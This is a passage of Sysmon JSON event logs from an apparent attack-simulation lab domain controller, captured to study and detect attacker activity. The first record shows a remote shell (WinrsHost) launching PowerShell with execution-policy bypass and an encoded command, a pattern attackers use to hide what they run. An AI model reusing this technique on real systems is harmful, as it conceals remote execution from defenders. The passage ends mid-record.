{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2498,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.223\r\nProcessGuid: {A837DB8D-01DE-5F25-0000-00108A790400}\r\nProcessId: 4432\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-01DE-5F25-0000-00208A6B0400}\r\nLogonId: 0x46B8A\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-01DE-5F25-0000-0010C46B0400}\r\nParentProcessId: 4332\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.223","ProcessGuid":"{A837DB8D-01DE-5F25-0000-00108A790400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-01DE-5F25-0000-00208A6B0400}","LogonId":"0x46b8a","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-01DE-5F25-0000-0010C46B0400}","ParentProcessId":"4332","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2499,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01DE-5F25-0000-0010C46B0400}\r\nSourceProcessId: 4332\r\nSourceThreadId: 4412\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {A837DB8D-01DE-5F25-0000-00108A790400}\r\nTargetProcessId: 4432\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01DE-5F25-0000-0010C46B0400}","SourceProcessId":"4332","SourceThreadId":"4412","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{A837DB8D-01DE-5F25-0000-00108A790400}","TargetProcessId":"4432","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2500,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01DE-5F25-0000-00108A790400}\r\nTargetProcessId: 4432\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01DE-5F25-0000-00108A790400}","TargetProcessId":"4432","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2501,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2502,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2503,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2504,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2505,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2506,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 